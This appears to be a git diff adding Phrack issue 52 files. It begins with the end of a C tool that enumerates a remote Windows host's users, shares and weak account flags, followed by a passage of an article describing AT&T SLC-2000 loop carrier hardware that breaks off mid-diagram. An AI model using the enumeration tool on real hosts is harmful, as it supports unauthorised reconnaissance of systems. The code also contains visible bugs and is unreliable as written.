+     fprintf(stderr, "couldnt enum users, ");
+     handle_error(nas);
+     goto cleanup;
+   }
+
+   cc = sizeof(USER_INFO_0) * entread;
+   if( (usrs = (USER_INFO_0 *)malloc(cc)) == NULL){
+     fprintf(stderr, "malloc probs\n");
+     goto cleanup;
+   }
+
+   memcpy(usrs, *buf, cc);
+   for(i = 0; i < entread; i++){
+                wcscpy(user, usrs[i].usri0_name);
+                wprintf(L"%s\n", user);
+                if(VERB)
+                        get_usr_info(utarg);
+    }
+
+cleanup:
+   if(buf)
+     free(buf);
+
+   return 0;
+}
+
+/*
+ * get_user_info()
+ *    attempt to gather some interesting facts about
+ *              a user
+ */
+void get_usr_info(LPWSTR utarg)
+{
+   NET_API_STATUS nas;
+   USER_INFO_1          usrinfos;
+   LPBYTE         *buf = NULL;
+
+   if( !(buf = (LPBYTE *)malloc(sizeof(USER_INFO_1))) )
+     bail("malloc probs\n");
+
+   nas = NetUserGetInfo(utarg, user, 1, buf);
+
+   if(nas){
+     fwprintf(stderr, L"couldnt get user info for for %s, ", user);
+     handle_error(nas);
+   }
+   else{
+     memcpy(&usrinfos, *buf, sizeof(USER_INFO_1));
+
+     /* most of these will never happen, but nothings lost trying */
+     if( (UF_PASSWD_NOTREQD & usrinfos.usri1_flags) )
+       printf("\t-password not required, how about that.\n");
+     if( (UF_ACCOUNTDISABLE & usrinfos.usri1_flags) )
+       printf("\t-account disabled\n");
+     if( (UF_LOCKOUT & usrinfos.usri1_flags) )
+       printf("\t-account locked out\n");
+     if( (UF_DONT_EXPIRE_PASSWD & usrinfos.usri1_flags) )
+       printf("\t-password doesnt expire\n");
+     if( (UF_PASSWD_CANT_CHANGE & usrinfos.usri1_flags) )
+       printf("\t-user cant change password\n");
+     if( (UF_WORKSTATION_TRUST_ACCOUNT & usrinfos.usri1_flags) )
+       printf("\t-account for some other box in this domain\n");
+     if( (UF_SERVER_TRUST_ACCOUNT & usrinfos.usri1_flags) )
+       printf("\t-account for what is prolly the BDC\n");
+     if( (UF_INTERDOMAIN_TRUST_ACCOUNT & usrinfos.usri1_flags) )
+       printf("\t-interdomain permit to trust account\n");
+   }
+
+   free(buf);
+}
+
+/*
+ * procure_sharelist()
+ *    strangely enough, this retrieves a sharelist from target
+ */
+int procure_sharelist()
+{
+   DWORD                        r;
+   DWORD                        bufsize = 16384, cnt = 0xFFFFFFFF;
+   HANDLE               enhan;
+   void                 *buf;
+   NETRESOURCE  *res;
+   u_int                        i;
+
+   if( (buf = malloc(bufsize)) == NULL){
+      fprintf(stderr, "malloc probs, bailing\n");
+      return -1;
+   }
+
+   nr.dwScope                   = RESOURCE_CONNECTED;
+   nr.dwType                    = RESOURCETYPE_ANY;
+   nr.dwDisplayType     = 0;
+   nr.dwUsage                   = RESOURCEUSAGE_CONTAINER;
+   nr.lpLocalName               = NULL;
+   nr.lpRemoteName      = (LPTSTR)target;
+   nr.lpComment    = NULL;
+   nr.lpProvider                = NULL;
+
+   r = WNetOpenEnum(RESOURCE_GLOBALNET, RESOURCETYPE_ANY,
+                                                  RESOURCEUSAGE_CONNECTABLE, &nr
+, &enhan);
+   if(r != 0){
+                free(buf);
+                printf("open_enum failed, sorry- ");
+                handle_error(r);
+                return -1;
+   }
+
+   r = WNetEnumResource(enhan, &cnt, buf, &bufsize);
+   if(r != 0){
+      free(buf);
+      printf("enum_res failed- ");
+                handle_error(r);
+                return -1;
+   }
+
+   res = (NETRESOURCE*)malloc(cnt * sizeof(NETRESOURCE));
+   if(res == NULL){
+      free(buf);
+      printf("malloc probs, i wont be listing shares.\n");
+                return -1;
+   }
+   memcpy(res, buf, (cnt * sizeof(NETRESOURCE)) );
+
+   for(i = 0; i < cnt; i++){
+      if(VERB)
+                        printf("\nshare name:\t");
+
+      printf("%s\n", res[i].lpRemoteName);
+      if(VERB){
+                        printf("share type:\t");
+                        if(res[i].dwType = RESOURCETYPE_DISK)
+                                printf("disk");
+                        else
+                                printf("printer");
+                                printf("\ncomment:\t%s\n", res[i].lpComment);
+                }
+   }
+
+   free(buf);
+   free(res);
+   return 0;
+}
+
+/*
+ * close_session()
+ *    clean up our mess
+ */
+int close_session()
+{
+   DWORD                r;
+
+   WSACleanup();
+   if(!OPT_NODEL)
+      r = WNetCancelConnection2(target, 0, TRUE);
+
+   if(r != 0){
+      fprintf(stderr, "couldnt delete %s, returned %d\n", target, r);
+      return -1;
+   }
+   else{
+      if(VERB)
+                        printf("connection to %s deleted\n", target);
+   }
+
+   return 0;
+}
+
+/*
+ * handle_error()
+ *    util function to deal with some errors.
+ */
+void handle_error(DWORD err)
+{
+   switch(err){
+   case ERROR_ACCESS_DENIED:
+                fprintf(stderr, "access is denied.\n");
+                break;
+   case ERROR_BAD_NET_NAME:
+                fprintf(stderr, "bad net name.\n");
+                break;
+   case ERROR_EXTENDED_ERROR:
+                fprintf(stderr, "an extended error occurred.\n");
+                break;
+   case ERROR_INVALID_PASSWORD:
+                fprintf(stderr, "invalid password.\n");
+                break;
+   case ERROR_LOGON_FAILURE:
+                fprintf(stderr, "bad username or password.\n");
+                break;
+   case NO_ERROR:
+                fprintf(stderr, "it worked\n");
+                break;
+   case ERROR_BAD_NETPATH:
+                fprintf(stderr, "network path not found.\n");
+                break;
+   default:
+                fprintf(stderr, "a random error occurred (%d).\n", err);
+        }
+}
+
+/*
+ * prepend_str()
+ *    util funk to prepend chars to a string
+ */
+void prepend_str(char *orgstr, char *addthis)
+{
+   orgstr = _strrev(orgstr);
+   addthis = _strrev(addthis);
+   strcat(orgstr, addthis);
+   orgstr = _strrev(orgstr);
+}
+/*
+ * parse_cl()
+ *    try and make sense of the command line.  no, i dont have a win32 getopt.
+ *    yes, i know i should
+ */
+void parse_cl(int argc, char **argv)
+{
+   int     i, cc;
+   char    opt;
+   DWORD                r;
+
+   OPT_SHARES = OPT_USERS = VERB = 0;
+
+   for(i = 1; i < (argc); i++){
+      if( (*argv[i]) == '-'){
+                        opt = *(argv[i]+1);
+                        switch(opt){
+                        case 'a':
+                                OPT_SHARES = 1;
+                                OPT_USERS  = 1;
+                                break;
+                        case 's':
+                                OPT_SHARES = 1;
+                        break;
+                        case 'u':
+                                OPT_USERS  = 1;
+                        break;
+                        case 'g':
+                                OPT_GETUI  = 1;
+                                if( (strlen(argv[i+1])) > USER_LEN)
+                                        bail("username too long (must be < 21)");
+                                ZeroMemory(user, USER_LEN);
+                                cc = strlen(argv[++i]);
+                                r = MultiByteToWideChar(CP_ACP, 0, argv[i], cc, user, (cc + 2));
+                                break;
+                        case 'd':
+                                OPT_NODEL = 1;
+                                break;
+                        case 'v':
+                                VERB++;
+                                break;
+                        default:
+                                if( (opt != 'h') && (opt != '?') )
+                                        fprintf(stderr, "unknown option '%c'\n", opt);
+                                usage(argv[0]);
+                                break;
+                        }
+                }
+   }
+
+        if( (OPT_SHARES) && (VERB) )
+      printf("listing shares\n");
+   if( (OPT_USERS) && (VERB) )
+      printf("listing users\n");
+   if( (OPT_GETUI) && (VERB) )
+      wprintf(L"getting infos about user %s\n", user);
+   if(VERB)
+      printf("verbosity = %d\n", VERB);
+}
+
+/*
+ * powerup()
+ *    just init stuff and parse the command line
+ */
+int powerup(int argc, char **argv)
+{
+   struct hostent       *hent;
+   u_long       addie;
+   WORD         werd;
+   WSADATA      data;
+   char         buf[256];
+   int          cc = 0, ucc = 0;
+
+   if(argc < 3)
+      usage(argv[0]);
+
+   parse_cl(argc, argv);
+   ZeroMemory(buf, 256);
+   strcpy(buf, argv[argc - 1]);
+
+/* if not unc format get the ip */
+   if(buf[0] != '\\'){
+      if(VERB > 1)
+                        printf("target not in unc\n");
+
+      werd = MAKEWORD(1, 1);
+      if( (WSAStartup(werd, &data)) !=0 )
+                        bail("couldnt init winsock\n");
+
+      hent = (struct hostent *)malloc(sizeof(struct hostent));
+      if(hent == NULL)
+                        bail("malloc probs\n");
+
+      if( (addie = inet_addr(buf)) == INADDR_NONE){
+                        hent = gethostbyname(buf);
+                        if(hent == NULL){
+                                fprintf(stderr, "fatal: couldnt resolve %s.\n", buf);
+                                return -1;
+                        }
+                        ZeroMemory(buf, 256);
+                        strcpy(buf, inet_ntoa(*(struct in_addr *)*hent->h_addr_list));
+      }
+      prepend_str(buf, "\\\\");
+   }
+   else
+      fprintf(stderr, "target already in unc\n");
+
+   if( (strlen(buf) > (TARG_LEN - 1)) ){
+      free(buf);
+      bail("hostname too long (must be < 255 chars.)");
+      return -1;
+   }
+
+   ZeroMemory(target, TARG_LEN);
+   strcpy(target, buf);
+
+   ZeroMemory(utarg, TARG_LEN);
+   cc = strlen(target);
+   ucc = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, target, cc, utarg, cc);
+   if(ucc < 1){
+      bail("unicode conversion probs, sorry");
+      return -1;
+   }
+
+   return 0;
+}
+
+void usage(char *prog)
+{
+   fprintf(stderr, "usage: %s [asug<username>hv] <target>\n", prog);
+   fprintf(stderr, "\t-s:\t\tget share list\n");
+   fprintf(stderr, "\t-u:\t\tget user list\n");
+   fprintf(stderr, "\t-g: <username>\tget infos about just <username>\n");
+   fprintf(stderr, "\t-d:\t\tleave connection established on exit\n");
+   fprintf(stderr, "\t-a:\t\t-s + -u\n");
+   fprintf(stderr, "\t-h, -?:\t\tdisplay this help\n");
+   fprintf(stderr, "\t-v:\t\tbe verbose (use twice to be garrolous)\n");
+   exit(0);
+}
+
+/*
+ * bail()
+ *    just whine and die
+ */
+void bail(const char *msg)
+{
+   fprintf(stderr, "fatal: %s\n", msg);
+   close_session();
+   exit(1);
+}
+<-->
+
+
+----[  EOF
+
diff --git a/phrack52/11.txt b/phrack52/11.txt
new file mode 100644
index 0000000..53809cc
--- /dev/null
+++ b/phrack52/11.txt
@@ -0,0 +1,1204 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 11 of 20
+
+
+-------------------------[  The Subscriber Loop Carrier (slick)
+
+
+--------[  Voyager[TNO]
+
+
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+ I............................................... Overview
+ II.............................................. The Central Office Terminal
+ III............................................. The Remote Terminal
+ IV.............................................. SLC-2000 Shelves
+ V............................................... Where might you find an RT?
+ VI.............................................. SLC Interface Software
+ VII............................................. SLC Glossary
+ VIII............................................ SLC Vendors
+
+
+
++----------+
+| Overview |
++----------+
+
+
+A Subscriber Loop Carrier (SLC) (often pronounced "slick") is a
+multiplexer which allows a large number of analog lines to be provided
+over a very small number of digital lines.  A good example is the AT&T
+SLC 5, which allows 192 subscriber loops to be provided through two or
+four digital lines. SLCs are also referred to as Digital Loop Carriers
+(DLCs).
+
+The first SLC was installed in 1971.  As of 1995, between 5 and 10% of
+all lines are served by SLCs, as are roughly 50% of all new lines built
+each year.  SLCs are available from quite a few vendors.  This article
+focuses on the extremely popular SLC-2000 from AT&T.
+
+A SLC usually consists of two separate subsystems, the Central Office
+Terminal (COT) and the Remote Terminal (RT).  The COT is connected to
+the RT via a DS1 circuit.  The DS1 circuit may be carried over actual T1
+lines, or it may be carried over another medium such as lightwave or
+digital radio.  The RT is then connected to the subscribers using a
+Voice Frequency (VF) circuit.  The VF circuit is what you and I would
+recognize as our normal phone line.
+
+This diagram illustrates a subscriber loop constructed using an SLC:
+
+ +---------+                                                      
+ |         |                                               /---------\
+ | Central |                     +----+                   /-----------\
+ | Office  |                     |    |        
+ |         | --- DS1 circuit --- | RT | --- VF circuit -- | Residence |
+ |  (COT)  |                     |    |                   |           |
+ |         |                     +----+                   +-----------+
+ +---------+
+
+
+
++-----------------------------+
+| The Central Office Terminal |
++-----------------------------+
+
+The SLC-2000 COT is a modular design usually consisting of the following
+components:
+
+        . Access Resource Manager (ARM) shelf
+        . Metallic Distribution Assembly (MDS) shelves
+        . Heat Baffles
+        . Alarm and Test Unit (ATU)
+
+
+ +--------------------------+
+ |  |  |  |  |  |  |  |  |  |  <------- Alarm and Test Unit
+ |--------------------------|
+ | |                        |  <------- Heat baffle
+ |--------------------------|
+ ||||||||||||||||||||||||||||
+ |:::::::::::::::::::;::;:::|  <--\
+ |--------------------------|      \___ Access Resource Manager (ARM) shelf
+ |:;;;;;;::;::::::::|||||||||      /
+ |.##||||.|,,,,,,,,,........|  <--/
+ |.##||||' '''''''''|||||||||
+ |--------------------------|
+ | |                        |  <------- Heat baffle
+ |--------------------------|
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|  <------- Metallic Distribution Shelf (MDS)
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|
+ |--------------------------|
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|  <------- Metallic Distribution Shelf (MDS)
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|
+ |--------------------------|
+ | |                        |  <------- Heat baffle
+ |--------------------------|
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|  <------- Metallic Distribution Shelf (MDS)
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|
+ |--------------------------|
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|  <------- Metallic Distribution Shelf (MDS)
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|
+ +--------------------------+
+
+
++---------------------+
+| The Remote Terminal |
++---------------------+
+
+The SLC-2000 RT is a modular design usually consisting of the following
+components:
+
+        . Access Resource Manager (ARM) shelf
+        . Metallic Distribution Assembly (MDS) shelves
+        . High Density Fiber Optics Shelf (HDOS) shelves (FITL only)
+        . Cooling fans
+
+
+
+An SLC-2000 RT configured for a Metallic Application
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ +--------------------------+
+ | |                        |  <------- Fan unit
+ |--------------------------|
+ ||||||||||||||||||||||||||||
+ |:::::::::::::::::::;::;:::|  <--\
+ |--------------------------|      \___ Access Resource Manager (ARM) shelf
+ |:;;;;;;::;::::::::|||||||||      /
+ |.##||||.|,,,,,,,,,........|  <--/
+ |.##||||' '''''''''|||||||||
+ |--------------------------|
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|  <------- Metallic Distribution Shelf (MDS)
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|
+ |--------------------------|
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|  <------- Metallic Distribution Shelf (MDS)
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|
+ |--------------------------|
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|  <------- Metallic Distribution Shelf (MDS)
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|
+ |--------------------------|
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|  <------- Metallic Distribution Shelf (MDS)
+ |!!!!!!!!!!^^||^^!!!!!!!!!!|
+ +--------------------------+
+
+
+An SLC-2000 RT configured for a Fiber In The Loop (FITL) Application
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ +--------------------------+
+ | |                        |  <------- Fan unit
+ |--------------------------|
+ ||^||^||^||^||^||^||^||^||^|  <------- High Density Optics Shelf (HDOS) #2
+ ||^||^||^||^||^||^||^||^||^|
+ |--------------------------|
+ ||^||^||^||^||^||^||^||^||^|  <------- High Density Optics Shelf (HDOS) #1
+ ||^||^||^||^||^||^||^||^||^|
+ |--------------------------|
+ | |                        |  <------- Fan unit
+ |--------------------------|
+ ||||||||||||||||||||||||||||
+ |:::::::::::::::::::;::;:::|  <--\
+ |--------------------------|      \___ Access Resource Manager (ARM) shelf
+ |:;;;;;;::;::::::::|||||||||      /
+ |.##||||.|,,,,,,,,,........|  <--/
+ |.##||||' '''''''''|||||||||
+ |--------------------------|
+ | | | |     ||||| | | | |  | <-------- Metallic Distribution Shelf (MDS) #4
+ | | | |     ||||| | | | |  |
+ |--------------------------|
+ | | | |     ||||| | | | |  | <-------- Metallic Distribution Shelf (MDS) #3
+ | | | |     ||||| | | | |  |
+ |--------------------------|
+ | | | |     ||||| | | | |  | <-------- Metallic Distribution Shelf (MDS) #2
+ | | | |     ||||| | | | |  |
+ |--------------------------|
+ | | | |     ||||| | | | |  | <-------- Metallic Distribution Shelf (MDS) #1
+ | | | |     ||||| | | | |  |
+ +--------------------------+
+
+
+
++------------------+
+| SLC-2000 Shelves |
++------------------+
+
+The SLC-2000 is divided into a number of shelves, each of which hold
+circuit cards that are responsible for specific functions within the
+SLC.  Some shelves are found only in COTs, others are found only in
+RTs, while most shelves are used in both COTs and RTs.
+
+
+Access Resource Manager (ARM) Shelf
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The ARM shelf provides feeder interface, bandwidth management and
+circuit maintenance features.
+
+The ARM shelf consists of the following functional component groups:
+
+        . User Interface Panel (UIP)
+        . Integrated Test Head (ITH)
+        . Provisioning Display Controller (PDC)
+        . Bandwidth Management Complex
+        . DS1 distribution
+        . DS1/VT feeder interfaces
+        . SONET feeder
+
+
+The following diagram illustrates the functional components of an ARM shelf:
+
+
+        /<-- ESD ground jack
+        |/<-- Power Converter Unit
+        || /<-- Transmission Signaling Unit
+        || |   /<-- Analog Measurement Unit
+        || |   | /<-- Power Amplifier Unit
+        || |   | | /<-- Craft Access Unit
+        || |   | | | /<-- System Memory Unit
+        || |   | | | | /<-- Provisioning and Display Controller
+        || |   | | | | |   /<-- Link to Alarm and Networks
+        || |   | | | | |   | /<-- DS1 interfaces
+        || |   | | | | |   | |
+       +----------------------------------------------------+
+       |^                                                   |
+       |----------------------------------------------------|
+       ||P|T| |A|P|C|S|P| |L|D|D|D|D|D|D|D|D|.|.|.|.|.|.|.|.|
+       ||C|S| |M|A|A|M|D| |A|S|S|S|S|S|S|S|S|---------------|
+       ||U|U| |U|U|U|U|C| |N|1|1|1|1|1|1|1|1| | | | | | | | |
+       ||.|.|.|.|.| |.|.|.|.|.|.|.|.|.|.|.|.| | | | | | | | |
+       |------------------------------------+ | | | | | | | |
+       || | | | | | | | | | | | | | | | | | | | | | | | | | | <-\
+   /-> || | | | | | | | | | | | | | | | | | | | | | | | | | |   |
+  |    ||.|:|:|:|:|:|:|.|.|:|.|.|.|.|.|.|.|.|:|:|:|:|:|:|:|:|   |
+  |    ||.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.| | | | | | | | |   |-\
+/-|    |------------------------------------+ | | | | | | | |   | |
+| |    || |o|o| | | | | ||| | | | | | | | | |---------------|   | |
+| |    ||.|o|o| | | | | |:|:|:|:|:|:|:|:|:|:|.|.|.|.|.|.|.|.|   | |
+|  \-> ||.| | | | | | | | |:|:|:|:|:|:|:|:|:| | | | | | | | | >-/ |
+|      ||.| | | | | | | | | | | | | | | | | | | | | | | | | |     |
+|      +-----------------------------------------------------     |
+|          | | | | | | | | |                                      |
+|          \ / \ \ / / | | \-- Test Head Controller (THC)         |
+|           |    \ /   | \-- System Controller (SYSCTL)           |
+|           |     |    \-- Overhead Controller (OHCTL)            |
+|           |     \-- STS-1 Multiplexer (MXRVO)                   |
+|           \--- Optical Line Interface Unit (OLIU)               |
+\-- Synchronous Timing Generator (TGS)                            |
+                                   Bandwidth Management Complex --/
+
+
+
+
+The User Interface Panel (UIP) represents the highest level of
+interaction possible with the SLC-2000 without plugging some other
+piece of equipment into it.  Here is a close-up of the User Interface
+Panel:
+
+                                                           Abnormal -->\
+   AMD (Alphanumeric Message Display) -->\          NE Activity >--\   |
+                        Attention -->\   |           Major -->\    |   |
+                  Panel Fault -->\   |   |     Critical -->\  |    |   |
+   /<-- ESD ground jack          |   |   |                 |  |    |   |
+   |                             |   |   |                 |  |    |   |
+ +------------------------------------------------------------------------+
+ |   | ~=~ ~~~  ~~   ~~ ~~~~~~ | __  ____________________  __ __   __  __ |
+ | O |________/----------------| |/  |* User Int. Panel |  |/ |/   |/  |/ |
+ |   |                         | __  ~~~~~~~~~~~~~~~~~~~~  __ __   __  __ |
+ |   | = = ooo ####  ## :::::: | |/  ^v  #  #  #  o#  #    |/ |/   |/  |/ |
+ +------------------------------------------------------------------------+
+       ||| |||   |   |  ||||||   |   |   |  |  |   |  |    |  |    |   |
+       ||| \|/   |   |  ||||||   |   |   |  |  |   |  |    |  |    |   |
+       \|/  |    |   |  ||||||   |   |   |  |  |   |  |    |  |    |   |
+        |   |    |   |  ||||||   |   |   |  |  |   |  |    |  |    |   |
+Fuses-->/   |    |   |  ||||||   |   |   |  |  |   |  |    |  |    |   |
+Power test  |    |   |  ||||||   |   |   |  |  |   |  |    |  |    |   |
+  points -->/    |   |  ||||||   |   |   |  |  |   |  |    |  |    |   |
+CIT connector -->/   |  ||||||   |   |   |  |  |   |  |    |  |    |   |
+  DDS clock conn. -->/  ||||||   |   |   |  |  |   |  |    |  |    |   |
+DDS Maintenance Jack -->/|||||   |   |   |  |  |   |  |    |  |    |   |
+ DS0 Maintenance Jack -->/||||   |   |   |  |  |   |  |    |  |    |   |
+  DS1 Maintenance Jack -->/|||   |   |   |  |  |   |  |    |  |    |   |
+   T-R Maintenance Jack -->/||   |   |   |  |  |   |  |    |  |    |   |
+  T1-R1 Maintenance Jack -->/|   |   |   |  |  |   |  |    |  |    |   |
+    E&M Maintenance Jack -->/    |   |   |  |  |   |  |    |  |    |   |
+                        Power -->/   |   |  |  |   |  |    |  |    |   |
+                    Scroll Buttons ->/   |  |  |   |  |    |  |    |   |
+                                Enter -->/  |  |   |  |    |  |    |   |
+                                  Escape -->/  |   |  |    |  |    |   |
+                                   LED Test -->/   |  |    |  |    |   |
+                                            ACO -->/  |    |  |    |   |
+                                            Update -->/    |  |    |   |
+                                                  Minor -->/  |    |   |
+                                                Power Minor ->/    |   |
+                                                    FE Activity -->/   |
+                                                            Session -->/
+
+
+
+
+There are many connections on the UIP.  The Electrostatic Discharge
+(ESD) ground jack is for a static control wrist strap.  The Craft
+Interface Terminal (CIT) connector is a DB-25 for plugging in a CIT or a
+PC running terminal emulation software.  The DDS clock connector
+provides a clock source for test sets.  The Power Test Points allow you
+to monitor the -48v power to the unit.
+
+There are many LED's on the UIP.  The Attention LED is yellow when the
+there is something new on the Alphanumeric Message Display (AMD).  The
+Panel Fault LED is red when the UIP is in need of repair.  The Power LED
+is green when -48v power is present.  The Power Minor LED is yellow when
+the system is operating on battery power. The Alarm Cut Off (ACO) LED is
+green when the ACO button has been pressed during an alarm.  The
+Critical LED is red when a failure has caused a loss of service for 128
+or more customers.  The Major LED is red when a failure has caused a
+loss of service for 24 or more customers.  The Minor LED is yellow when
+an error exists, but is not causing a loss of service to any customers.
+The Near End (NE) Activity LED is yellow when the local terminal has
+some alarm condition.  The Far End (FE) Activity LED is yellow when the
+remote terminal has some alarm condition.  The Abnormal LED is yellow
+when the SLC-2000 is not in a mode that provides service, such as a test
+mode. The Session LED is yellow when a technician has a CIT connected to
+the remote terminal.
+
+The most interesting part of the UIP is the Alphanumeric Message Display
+(AMD) and the buttons associated with its use.  The AMD displays a
+single 24 character line of text.  The scroll buttons may be pushed to
+move forward and backward through various menu choices.  The <Enter> and
+<Escape> keys work just as you might imagine.
+
+Three types of messages appear on the User Interface Panel (UIP):
+
+        . Automatic Messages
+        . Fault Messages
+        . Alarm Messages
+
+
+        Automatic Messages are triggered by pressing certain buttons,
+        UIP or PDC unavailability, and SYSCTL installation.
+
+        Fault Messages are displayed when the RETRIEVE-FAULTS command is
+        selected on the UIP.
+
+        Alarm Messages are displayed when the RETRIEVE-ALARMS command is
+        selected on the UIP.
+
+
+The Automatic Messages are:
+
+        . PANEL FAULT
+        . MN:NE:pdc unavail
+        . UPDATE: In-Progress
+        . UPDATE: done
+        . SONET SUBSYS UPDATE done
+        . SYSCTL INITIALIZATION
+        . SYSCTL EXTENDED INITZN
+        . SYSCTL EXTND INITZN done
+        . STATUS -LOCAL SONET
+        . STATUS -LOCAL SONET SITE
+        . STATUS -REMOTE SITE 1
+        . STATUS -REMOTE SITE 2
+        . STATUS -REMOTE SITE 3
+        . STATUS -REMOTE SITE 4
+        . STATUS -REMOTE SITE 5
+        . STATUS -REMOTE SITE 6
+        . STATUS -REMOTE SITE 7
+        . STATUS -REMOTE SITE 8
+
+
+        "PANEL FAULT" indicates that the User Interface Panel (UIP) has
+        failed and is unable to communicate with the Provisioning
+        Display Controller (PDC).
+
+        "MN:NE:pdc unavail" indicates that the Provisioning Display
+        Controller (PDC) is unable to communicate with the User
+        Interface Panel (UIP) because it has failed, or because software
+        installation on the PDC is in progress.
+
+        "UPDATE: In-Progress" indicates that the UPDATE button has been
+        pressed and that an update is in progress.  (See "Update button"
+        below.)
+
+        "UPDATE: done" indicates that an Update has been completed in
+        response to the use of the UPDATE button.
+
+        "SONET SUBSYS UPDATE done" indicates that an Update has been
+        completed in the SONET subsystem in response to the use of the
+        UPD/INIT button on the SYSCTL.
+
+        "SYSCTL INITIALIZATION" appears for 10 seconds after a SYSCTL
+        with working software has been inserted.  If the UPD/INIT button
+        on the SYSCTL is pressed while this message is displayed, the
+        SYSCTL will reset all SONET parameters to their factory
+        defaults.
+
+        "SYSCTL EXTENDED INITZN" appears after SYSCTL INITIALIZATION has
+        been completed.
+
+        "SYSCTL EXTND INITZN done" appears after SYSCTL EXTND INITZN has
+        been completed.
+
+        "STATUS -LOCAL SONET" indicates the User Interface Panel (UIP)
+        indicators reflect the alarm status of the local system only.
+        The letter "L" is displayed in the SYSCTL 7-segment display.
+        This occurs when the user toggles the Far-End Select (FE SEL)
+        button on the SYSCTL.
+
+        "STATUS -LOCAL SONET SITE" indicates the User Interface Panel
+        (UIP) indicators reflect the combined alarm status of all the
+        SONET network elements at the local site.  The SITE ID and a '.'
+        is displayed in the SYSCTL 7-segment display.  This occurs when
+        the user toggles the Far-End Select (FE SEL) button on the
+        SYSCTL.
+
+        "STATUS -REMOTE SITE x" indicates the User Interface Panel (UIP)
+        indicators reflect the alarm status of REMOTE SITE x.  The
+        number "x" is displayed in the SYSCTL 7-segment display.  This
+        occurs when the user toggles the Far-End Select (FE SEL) button
+        on the SYSCTL.
+
+
+
+There are several other miscellaneous buttons on the UIP.  The LED Test
+button lights up all of the LED's to allow quick identification of burnt
+out LED's. The Alarm Cut Off (ACO) button shuts off the current alarm
+condition. The Update button operates much like the "Detect New
+Hardware" icon in Windows95, except that on the SLC-2000 it never locks
+up your system.
+
+
+
+
+Metallic Distribution Shelf (MDS)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The MDS provides control and distribution for Data Service 0 (DS0) and
+Fiber In The Loop (FITL) interfaces.
+
+The following diagram roughly illustrates an MDS shelf assembly in a
+metallic configuration:
+
+ +-----------------------------------------------------------------------+
+ |* AT&T  ##== ##== ##== ##==   ##== ##==    Metallic Distribution Shelf |
+ |-----------------------------------------------------------------------|
+ |~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|
+ | :| :| :| :| :| :| :| :| :| *| *| *| *| *| *| :| :| :| :| :| :| :| :| :|
+ | :| :| :| :| :| :| :| :| :| *| *|  |  | *| *| :| :| :| :| :| :| :| :| :|
+ |=:|=:|=:|=:|=:|=:|=:|=:|=:|  |  |  |  |  |  |=:|=:|=:|=:|=:|=:|=:|=:|=:|
+ |=:|=:|=:|=:|=:|=:|=:|=:|=:| *|  |  |  |  | *|=:|=:|=:|=:|=:|=:|=:|=:|=:|
+ | || || || || || || || || || || || || || || || || || || || || || || || ||
+ |!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||
+ |-----------------------------------------------------------------------|
+ |~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|~~|
+ | :| :| :| :| :| :| :| :| :| *| *| *| *| *| *| :| :| :| :| :| :| :| :| :|
+ | :| :| :| :| :| :| :| :| :| *| *|  |  | *| *| :| :| :| :| :| :| :| :| :|
+ |=:|=:|=:|=:|=:|=:|=:|=:|=:|  |  |  |  |  |  |=:|=:|=:|=:|=:|=:|=:|=:|=:|
+ |=:|=:|=:|=:|=:|=:|=:|=:|=:| *|  |  |  |  | *|=:|=:|=:|=:|=:|=:|=:|=:|=:|
+ | || || || || || || || || || || || || || || || || || || || || || || || ||
+ |!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||!||
+ +-----------------------------------------------------------------------+
+
+
+MDS upper and lower shelves are numbered from bottom to top.  On the
+left and right side of each shelf half are 12 channel units (only 9 are
+pictured in the ASCII diagram).  In the middle of each shelf half are
+the common units.
+
+The following diagram roughly illustrates an MDS shelf assembly in a
+Fiber In The Loop (FITL) configuration:
+
+ +-----------------------------------------------------------------------+
+ |* AT&T  ##== ##== ##== ##==   ##== ##==    Metallic Distribution Shelf |
+ |-----------------------------------------------------------------------|
+ |AT&T|AT&T|AT&T|AT&T|      |~~|~~|~~|~~|~~|~~|AT&T|AT&T|AT&T|AT&T|      |
+ |*   |*   |*   |*   |      | *| *| *| *| *| *|*   |*   |*   |*   |      |
+ |*   |*   |*   |*   |      | *| *|  |  | *| *|*   |*   |*   |*   |      |
+ |*   |*   |*   |*   |      |  |  |  |  |  |  |*   |*   |*   |*   |      |
+ |*   |*   |*   |*   |      | *|  |  |  |  | *|*   |*   |*   |*   |      |
+ | || | || | || | || |      | || || || || || || || | || | || | || |      |
+ | || | || | || | || |      |!||!||!||!||!||!|| || | || | || | || |      |
+ |-----------------------------------------------------------------------|
+ |AT&T|AT&T|AT&T|AT&T|      |~~|~~|~~|~~|~~|~~|AT&T|AT&T|AT&T|AT&T|      |
+ |*   |*   |*   |*   |      | *| *| *| *| *| *|*   |*   |*   |*   |      |
